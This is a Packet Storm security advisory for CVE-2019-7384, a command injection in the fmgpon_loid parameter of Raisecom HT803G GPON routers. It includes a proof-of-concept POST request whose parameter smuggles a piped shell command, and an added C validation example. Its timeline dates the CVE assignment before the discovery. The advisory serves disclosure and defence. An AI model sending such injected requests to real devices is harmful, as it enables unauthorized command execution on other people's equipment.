
Raisecom Technology GPON-ONU HT803G-07 Command Injection

Posted Feb 13, 2019
Authored by Kaustubh G. Padwad

Raisecom Technology GPON-ONU HT803G-07 suffers from an authenticated command injection vulnerability in the fmgpon_loid parameter.

tags | exploit
advisories | CVE-2019-7384
MD5 | a7b4b967b526835e031e08633772389a

=====================================
Authenticated Shell Command Injection
=====================================

.. contents:: Table Of Contents

Overview
========

Title: Authenticated Shell Command Injection
Author: Kaustubh G. Padwad
CVE ID: CVE-2019-7384
Vendor: Raisecom Technology Co., Ltd.
Product: GPON-ONU HT803G-07 (other models sharing the same codebase may also be affected)

Potentially vulnerable:

ISCOM HT803G-U
ISCOM HT803G-W
ISCOM HT803G-1GE
ISCOM HT803G


Tested Version: ISCOMHT803G-U_2.0.0_140521_R4.1.47.002
Severity: High to Critical

Advisory ID
============
KSA-Dev-005


About the Product:
==================

The Raisecom GPON optical network terminal (ONT) series provides a flexible mix of residential access services including high speed data, IPTV, voice and CATV services compliant with the ITU-T G.984 standard. In particular, the Raisecom ONUs are designed for Ethernet data services, voice over IP, IPTV, CATV, wireless router access and convenient USB 2.0 home network storage connections for various application scenarios, such as residential triple-play service and business connections. The GPON ONT series offers flexible choices in terms of downlink types and numbers, such as GE/FE auto-adapting Ethernet ports, POTS (FXS) interfaces, an RF port and WiFi compliant with IEEE 802.11b/g/n. All GPON FTTX ONUs offer advanced end-to-end management and monitoring functionality, and the GPON series can be managed under the Raisecom NView platform.


Description:
============

An authenticated shell command injection issue has been discovered in Raisecom ISCOM HT803G-U, HT803G-W, HT803G-1GE, and HT803G GPON products with the firmware version
ISCOMHT803G-U_2.0.0_140521_R4.1.47.002 or below. The value of the fmgpon_loid parameter is used in a system call
inside the boa binary. Because there is no user input validation, this leads to authenticated code execution on the device.

Additional Information
======================

The value of the fmgpon_loid parameter is passed to a system() call in the application code inside the boa binary. Since there is no validation of this user input, an authenticated user can inject shell commands, which leads to authenticated code execution on the device.


Vulnerability Class:
====================
Authenticated Shell Command Injection

Attack Type
===========
Local


Impact Code execution
=====================
true

Attack Vectors
==============
To exploit this vulnerability, one must visit a crafted page or send a properly crafted request to the device.



How to Reproduce (PoC):
=======================

POST /boaform/admin/formgponConf HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.1/gpon.asp
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 162

fmgpon_loid=%7c%20ping%20-n%2013%20127%2e0%2e0%2e1%20%7c&fmgpon_loid_password=raisecom&fmgpon_ploam_password=1234567890&apply=Apply+Changes&submit-url=%2Fgpon.asp
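The request above shows the problem in one parameter: fmgpon_loid is URL-decoded by the form handler and then handed to system() unchecked. The following is an added example, not Raisecom's or the boa binary's code, that decodes a form body of this shape, extracts fmgpon_loid and applies the allowlist check the handler is missing; the LOID character set and length limit are assumptions, and the body is a constructed copy of the PoC request.

```c
/* Added example, not Raisecom's code: decode an x-www-form-urlencoded body,
 * pull out fmgpon_loid and allowlist-check it before it could reach system(). */
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
/* Return the percent-decoded value of key=... in body, or NULL if absent.
 * One static buffer: each call overwrites the previous result. */
const char *form_get(const char *body, const char *key) {
    static char val[256];
    size_t klen = strlen(key), o = 0;
    const char *p = body;
    while (p) {
        if (strncmp(p, key, klen) == 0 && p[klen] == '=') {
            for (p += klen + 1; *p && *p != '&' && o + 1 < sizeof val; p++) {
                if (*p == '+') { val[o++] = ' '; continue; }   /* form-encoded space */
                if (*p == '%' && isxdigit((unsigned char)p[1]) && isxdigit((unsigned char)p[2])) {
                    char hex[3] = { p[1], p[2], 0 };
                    val[o++] = (char)strtol(hex, NULL, 16);
                    p += 2;
                } else val[o++] = *p;
            }
            val[o] = 0;
            return val;
        }
        if ((p = strchr(p, '&'))) p++;   /* skip to the next key=value pair */
    }
    return NULL;
}

/* Allowlist: 1..24 chars from [A-Za-z0-9_-] (assumed LOID format); anything
 * the shell would interpret ('|', ';', '`', '$', spaces, quotes) is rejected. */
int loid_is_safe(const char *loid) {
    size_t n = loid ? strlen(loid) : 0;
    if (n == 0 || n > 24) return 0;
    for (; *loid; loid++)
        if (!isalnum((unsigned char)*loid) && *loid != '_' && *loid != '-') return 0;
    return 1;
}

/* Constructed copy of the advisory's PoC request body. */
const char *POC_BODY =
    "fmgpon_loid=%7c%20ping%20-n%2013%20127%2e0%2e0%2e1%20%7c&fmgpon_loid_password="
    "raisecom&fmgpon_ploam_password=1234567890&apply=Apply+Changes&submit-url=%2Fgpon.asp";

int main(void) {
    const char *loid = form_get(POC_BODY, "fmgpon_loid");
    printf("fmgpon_loid = \"%s\" -> %s\n", loid, loid_is_safe(loid) ? "accepted" : "rejected");
    return 0;
}
```

The same allowlist applies to any value that ends up in a shell command; where the firmware must run ping or similar, passing the validated token to an exec-style call with a fixed argument vector removes the shell from the path entirely.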

Mitigation
==========

According to the vendor, this issue is fixed in the latest firmware.

Disclosure:
===========
28-NOV-2018 Discovered the vulnerability
28-NOV-2018 Reported to vendor
10-Dec-2018 Received confirmation from vendor regarding fix
04-JAN-2019 Request for the CVE-ID
04-FEB-2018: CVE assigned

Credits:
========
* Kaustubh Padwad
* Information Security Researcher
* kingkaustubh@me.com
* https://s3curityb3ast.github.io/
* https://twitter.com/s3curityb3ast
* http://breakthesec.com
* https://www.linkedin.com/in/kaustubhpadwad




© 2019 Packet Storm. All rights reserved.